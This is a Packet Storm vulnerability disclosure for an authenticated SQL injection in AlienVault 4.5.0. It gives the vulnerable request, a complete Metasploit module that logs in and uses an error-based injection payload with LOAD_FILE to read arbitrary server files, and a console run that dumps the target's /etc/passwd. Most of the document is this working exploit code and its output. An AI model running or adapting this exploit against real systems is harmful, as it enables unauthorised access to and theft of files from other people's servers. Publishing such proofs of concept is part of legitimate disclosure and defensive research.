AlienVault 4.5.0 SQL Injection

2014-03-31T00:00:00
ID PACKETSTORM:125956
Type packetstorm
Reporter Brandon Perry
Modified 2014-03-31T00:00:00

Description

                                        
                                            `The following request is vulnerable to a SQL injection attack from authenticated users.  
  
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1  
Host: 172.31.16.150  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==  
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;  
Connection: keep-alive  
  
  
------------------------------------------------------------------------------------------------  
  
The following metasploit module will exploit this in order to read a file off of the file system:  
  
  
##  
## This module requires Metasploit: http//metasploit.com/download  
## Current source: https://github.com/rapid7/metasploit-framework  
###  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read",  
'Description' => %q{  
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG  
generation PHP file. This module exploits this to read an arbitrary file from  
the file system. Any authed user should be usable. Admin not required.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module  
],  
'References' =>  
[  
],  
'Platform' => ['linux'],  
'Privileged' => false,  
'DisclosureDate' => "Mar 30 2014"))  
  
register_options(  
[  
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),  
OptString.new('USERNAME', [ true, 'Single username', 'username']),  
OptString.new('PASSWORD', [ true, 'Single password', 'password']),  
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/'])  
], self.class)  
  
end  
  
def run  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')  
})  
  
cookie = res.get_cookies  
  
post = {  
'embed' => '',  
'bookmark_string' => '',  
'user' => datastore['USERNAME'],  
'passu' => datastore['PASSWORD'],  
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])  
}  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),  
'method' => 'POST',  
'vars_post' => post,  
'cookie' => cookie  
})  
  
if res.headers['Location'] != '/ossim/'  
fail_with('Authentication failed')  
end  
  
cookie = res.get_cookies  
  
done = false  
i = 0  
full = ''  
  
while !done  
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471,"  
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR),"  
pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"  
pay << " GROUP BY x)a) AND 'xnDa'='xnDa"  
  
get = {  
'date_from' => pay,  
'date_to' => '2014-03-30'  
}  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),  
'cookie' => cookie,  
'vars_get' => get  
})  
  
file = /quwtq(.*)qiqmq/.match(res.body)  
  
file = file[1]  
  
if file == ''  
done = true  
end  
  
str = [file].pack("H*")  
full << str  
vprint_status(str)  
  
i = i+1  
  
end  
  
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])  
print_good("File stored at path: " + path)  
end  
end  
  
-----------------------------------------------------------------------------  
  
Quick run of the module:  
  
msf auxiliary(alienvault_isp27001_sqli) > show options  
  
Module options (auxiliary/gather/alienvault_isp27001_sqli):  
  
Name Current Setting Required Description  
---- --------------- -------- -----------  
FILEPATH /etc/passwd yes Path to remote file  
PASSWORD password yes Single password  
Proxies no Use a proxy chain  
RHOST 172.31.16.150 yes The target address  
RPORT 443 yes The target port  
TARGETURI / yes Relative URI of installation  
USERNAME username yes Single username  
VHOST no HTTP server virtual host  
  
msf auxiliary(alienvault_isp27001_sqli) > run  
  
[+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt  
[*] Auxiliary module execution completed  
80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300  
[*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt  
  
root:x:0:0:root:/root:/usr/bin/llshell  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
libuuid:x:100:101::/var/lib/libuuid:/bin/sh  
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin  
munin:x:102:104::/var/lib/munin:/bin/false  
postfix:x:103:106::/var/spool/postfix:/bin/false  
snmp:x:104:108::/var/lib/snmp:/bin/false  
hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false  
ossec:x:1000:1000::/var/ossec/:/bin/false  
ossecm:x:1001:1000::/var/ossec/:/bin/false  
ossecr:x:1002:1000::/var/ossec/:/bin/false  
ntop:x:106:111::/var/lib/ntop:/bin/false  
snort:x:107:112:Snort IDS:/var/log/snort:/bin/false  
prads:x:108:113::/home/prads:/bin/false  
nagios:x:109:114::/var/lib/nagios:/bin/false  
mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false  
asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false  
mongodb:x:112:65534::/home/mongodb:/bin/false  
avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false  
avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false  
stunnel4:x:115:122::/var/run/stunnel4:/bin/false  
avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false  
avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash  
rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false  
avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false  
msf auxiliary(alienvault_isp27001_sqli) >   
  
`